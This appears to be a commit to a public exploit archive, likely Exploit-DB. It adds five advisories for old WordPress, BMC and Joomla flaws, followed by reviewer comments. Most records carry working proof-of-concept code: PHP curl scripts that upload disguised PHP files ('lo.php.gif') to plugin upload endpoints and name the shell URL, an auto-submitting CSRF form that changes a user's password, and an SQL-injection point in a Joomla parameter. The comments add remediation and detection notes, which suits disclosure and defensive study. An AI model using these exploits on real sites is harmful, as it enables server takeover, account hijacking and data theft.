
Commit 441db36

author
Offensive Security
committed
DB: 2015-06-26
5 new exploits
1 parent 611a357 commit 441db36

6 files changed

Lines changed: 105 additions & 0 deletions

files.csv

Lines changed: 5 additions & 0 deletions
@@ -33723,3 +33723,8 @@ id,file,description,date,author,platform,type,port
3372333723
37367,platforms/windows/local/37367.rb,"Windows ClientCopyImage Win32k Exploit",2015-06-24,metasploit,windows,local,0
3372433724
37368,platforms/multiple/remote/37368.rb,"Adobe Flash Player ShaderJob Buffer Overflow",2015-06-24,metasploit,multiple,remote,0
3372533725
37369,platforms/php/webapps/37369.txt,"Vesta Control Panel 0.9.8 - OS Command Injection",2015-06-24,"High-Tech Bridge SA",php,webapps,0
33726+
37370,platforms/php/webapps/37370.php,"WordPress FCChat Widget Plugin 2.2.x 'Upload.php' Arbitrary File Upload Vulnerability",2012-06-07,"Sammy FORGIT",php,webapps,0
33727+
37371,platforms/php/webapps/37371.php,"WordPress Picturesurf Gallery Plugin 'upload.php' Arbitrary File Upload Vulnerability",2012-06-03,"Sammy FORGIT",php,webapps,0
33728+
37372,platforms/java/webapps/37372.html,"BMC Identity Management Cross Site Request Forgery Vulnerability",2012-06-11,"Travis Lee",java,webapps,0
33729+
37373,platforms/php/webapps/37373.php,"WordPress Contus Video Gallery Plugin 'upload1.php' Arbitrary File Upload Vulnerability",2012-06-12,"Sammy FORGIT",php,webapps,0
33730+
37374,platforms/php/webapps/37374.txt,"Joomla! Alphacontent Component 'limitstart' Parameter SQL Injection Vulnerability",2012-06-10,xDarkSton3x,php,webapps,0
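Review bot: the three WordPress records indexed here (37370, 37371, 37373) get a .php extension although, as the added files further down show, each one is advisory prose with an embedded PHP fragment rather than a script that runs on its own; the .txt extension used for 37369 and 37374 in this same hunk describes that kind of content more accurately and keeps the archive consistent. The 2012 values in the `date` column are the original SecurityFocus disclosure dates and match the `source:` BIDs in the new files, so those need no change even though the commit itself is dated 2015-06-26.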

platforms/java/webapps/37372.html

Lines changed: 7 additions & 0 deletions
@@ -0,0 +1,7 @@
1+
source: http://www.securityfocus.com/bid/53924/info
2+
3+
Identity Management is prone to a cross-site request-forgery vulnerability because the application fails to properly validate HTTP requests.
4+
5+
Exploiting this issue may allow a remote attacker to perform certain actions in the context of an authorized user's session and gain unauthorized access to the affected application; other attacks are also possible.
6+
7+
<html><head><title>BMC IDM Change PW CSRF PoC</title></head> <body onload="document.getElementById('CSRF').submit()"> <form action="https://xxx.xxx.xxx.xxx/idm/password-manager/changePasswords.do"; method="post" id="CSRF"> <input type="hidden" name="colChkbx_Tab1" value="CN=Test User,OU=User Accounts,DC=corporate,DC=business,DC=com corporate Win2000" /> <input type="hidden" name="password" value="Abc123!" /> <input type="hidden" name="passwordAgain" value="Abc123!" /> <input type="hidden" name="selAccts" value="CN=user Name,OU=User Accounts,DC=corporate,DC=business,DC=com corporate Win2000" /> </form></body></html>
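Review bot: the `<form>` tag carries a stray semicolon after the closing quote of the `action` attribute (`action="https://xxx.xxx.xxx.xxx/idm/password-manager/changePasswords.do"; method="post"`), which is not valid attribute syntax; drop the semicolon so the markup parses as written rather than by browser error recovery. The entire document is also collapsed onto a single line, which hides the four hidden inputs; one element per line would make the record readable. For the defensive reading, the form contains only `colChkbx_Tab1`, `password`, `passwordAgain` and `selAccts` and no per-request token, which is exactly the condition the advisory text describes ("fails to properly validate HTTP requests"); the fix is a synchronizer token (or SameSite session cookies) on `changePasswords.do`, and password-change POSTs arriving with an off-site `Origin`/`Referer` are the signal a detection rule should key on.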

platforms/php/webapps/37370.php

Lines changed: 31 additions & 0 deletions
@@ -0,0 +1,31 @@
1+
source: http://www.securityfocus.com/bid/53855/info
2+
3+
WordPress FCChat Widget plugin is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
4+
5+
An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
6+
7+
WordPress FCChat Widget plugin 2.2.12.2 through versions 2.2.13.1 are vulnerable.
8+
9+
<?php
10+
11+
$uploadfile="lo.php.gif";
12+
$ch =
13+
curl_init("http://www.exemple.com/wordpress/wp-content/plugins/fcchat/html/Upload.php?id=1");
14+
curl_setopt($ch, CURLOPT_POST, true);
15+
curl_setopt($ch, CURLOPT_POSTFIELDS,
16+
array('Filedata'=>"@$uploadfile",
17+
'Submit'=>'submit'));
18+
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
19+
$postResult = curl_exec($ch);
20+
curl_close($ch);
21+
print "$postResult";
22+
23+
?>
24+
25+
Shell Access :
26+
http://www.exemple.com/wordpress/wp-content/plugins/fcchat/html/images/1_lo.php.gif
27+
28+
lo.php.gif
29+
<?php
30+
phpinfo();
31+
?>
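Review bot: the assignment at lines 12-13 is broken across a line break (`$ch =` on one line, `curl_init(...)` on the next), a wrapping artifact that should be joined, and the placeholder host is spelt `exemple.com` here while 37373 in this same commit uses `example.com`; both should be normalised. The affected-version sentence at line 7 ("plugin 2.2.12.2 through versions 2.2.13.1 are vulnerable") also needs a grammar pass, e.g. "versions 2.2.12.2 through 2.2.13.1 are vulnerable". On the defensive side, the `Shell Access :` path `html/images/1_lo.php.gif` shows that `Upload.php` stores the file under the plugin's web-served `images/` directory and keeps the client-supplied name (only an `id` prefix is added), so the fix is server-side extension allow-listing, discarding the client filename, and storing uploads where the web server does not execute scripts.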

platforms/php/webapps/37371.php

Lines changed: 33 additions & 0 deletions
@@ -0,0 +1,33 @@
1+
source: http://www.securityfocus.com/bid/53894/info
2+
3+
Picturesurf Gallery plugin is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
4+
5+
An attacker can exploit this issue to upload arbitrary PHP code and run it in the context of the Web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
6+
7+
Picturesurf Gallery 1.2 is vulnerable; other versions may also be affected.
8+
9+
PostShell.php
10+
<?php
11+
12+
$uploadfile="lo.php.gif";
13+
$ch =
14+
curl_init("http://www.exemple.com/wordpress/wp-content/plugins/picturesurf-gallery/upload.php");
15+
curl_setopt($ch, CURLOPT_POST, true);
16+
curl_setopt($ch, CURLOPT_POSTFIELDS,
17+
array('Filedata'=>"@$uploadfile",
18+
'is_simple'=>'is_simple'));
19+
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
20+
$postResult = curl_exec($ch);
21+
curl_close($ch);
22+
print "$postResult";
23+
24+
?>
25+
26+
Shell Access :
27+
http://www.exemple.com/wordpress/wp-content/plugins/picturesurf-gallery/data/upload/lo.php.gif
28+
29+
lo.php.gif
30+
GIF89a???????????!??????,???????D?;?
31+
<?php
32+
phpinfo();
33+
?>
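Review bot: line 30 of the payload listing is binary GIF header data mangled into `GIF89a???????????!??????,???????D?;?`, which neither reproduces the bytes nor reads as documentation; the record should describe it as the GIF89a signature (or hex-encode it) instead of embedding raw bytes in a text file. The same wrapped `$ch =` assignment (lines 13-14) and `exemple.com` spelling as in 37370 appear here and should be fixed the same way. Defensively, the `data/upload/lo.php.gif` path shows the upload is written under the plugin directory with its original name unchanged, so the remediation matches 37370: validate the extension against an allow-list rather than trusting a leading image header, rename on save, and serve `data/upload/` from a location with script execution disabled.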

platforms/php/webapps/37373.php

Lines changed: 22 additions & 0 deletions
@@ -0,0 +1,22 @@
1+
source: http://www.securityfocus.com/bid/53931/info
2+
3+
WordPress Contus Video Gallery is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
4+
5+
An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
6+
7+
WordPress Contus Video Gallery 1.3 is vulnerable; other versions may also be affected.
8+
9+
<?php
10+
11+
$uploadfile="lo.php.jpg";
12+
$ch = curl_init("http://www.example.com/wordpress/wp-content/plugins/contus-video-galleryversion-10/upload1.php");
13+
curl_setopt($ch, CURLOPT_POST, true);
14+
curl_setopt($ch, CURLOPT_POSTFIELDS,
15+
array('myfile'=>"@$uploadfile",
16+
'mode'=>'image'));
17+
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
18+
$postResult = curl_exec($ch);
19+
curl_close($ch);
20+
print "$postResult";
21+
22+
?>
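Review bot: the plugin path `contus-video-galleryversion-10` at line 12 reads like a missing separator between the plugin slug and `version-10` and should be checked against the plugin's real directory name before this is archived. Unlike its sibling records 37370 and 37371, this entry documents neither what the `mode=image` POST field controls nor the contents of `lo.php.jpg`, and the only scoping detail is the single line "Contus Video Gallery 1.3 is vulnerable"; at minimum the record should say what `upload1.php` checks (or fails to check) so a defender can confirm whether a patched build validates the extension and MIME type of `myfile`.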

platforms/php/webapps/37374.txt

Lines changed: 7 additions & 0 deletions
@@ -0,0 +1,7 @@
1+
source: http://www.securityfocus.com/bid/53942/info
2+
3+
The Alphacontent component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
4+
5+
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
6+
7+
http://www.example.com/index.php?option=com_alphacontent&section=weblinks&Itemid=1&lang=de&limitstart=[sqli]
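Review bot: the record (and its files.csv row) names no affected Alphacontent version, whereas the four sibling entries in this commit each carry one; add the version tested or state explicitly that it is unknown. The injection point is `limitstart`, which Joomla uses as the integer pagination offset, so the correct fix on the component side is to cast the value with `(int)` or bind it as a query parameter before it reaches SQL, and a WAF or IDS rule can flag any non-numeric `limitstart` on requests with `option=com_alphacontent`.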
